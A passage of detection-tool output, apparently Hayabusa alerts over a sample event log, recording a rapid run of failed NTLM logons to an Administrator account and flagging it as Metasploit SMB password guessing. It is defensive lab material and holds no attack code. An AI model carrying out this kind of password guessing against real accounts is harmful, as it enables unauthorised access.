Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aX0wfTs5FzCdwGrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gdU6faDjEH5wW2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 507PC8xD6l0TbhG3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrWgYcf9EuXt4MHS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvIGEw3fdX9cDzIV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9X1q0dT5irWa44Rz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpgAkElSQjVo53z2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nxUEwRMaiAhiIXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIoaysmFNfEerv8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aHLhFgL0xfnrAIoF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YGK96B1hDPMK9YKh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhDnNRDnAwctVtgQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zzO7RKaBPpg549A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDgDGO3IKiLoIQ5D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aaYeBTUEudC3446 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I41H8U06uuGlMf9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6Eh55149gbuU2el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajzJabQi7CjosFQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l9y7gyU9aJi6Fpm3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hbLiIVcBYlu5JkX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDfEfHk54J3lJI6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WOpuMTECalyeObl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nZQYU1dyQOqlNJDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pc58gDT07WNH3mMz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhExnDfInKbEI6AO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKKTTQ0ZT2Ye4TV9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LdBFYyftnH67Gyh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eO6c2PDl7zVBGzPi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ONnDOs16EnBkdFv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTHHCX9EoKRY4zhR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f1jhH08oLzpONDpa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o2YK7zc7Ne9c8txA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86CrOo9CFreIzSM5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0X9UEojEnc350xPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9g3PO3jofnySl92G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TRndfQmPYuhV0Ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yyJOdaks4B1sKMDv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IB3OSmcFx5TUiiJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lo3Ex40dkIeO53HF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkzDG8QOM2cxbokF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YoMf36ZXJBLnYxtc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5izPIefHqDDWNDlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z9o4f1XvvcVXBNwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IjCR48ZJFyEhzrYI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUV9i4O2gapcC01d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJzGAMQCvJBFOUPq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fyyu0x6I29R2J10Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 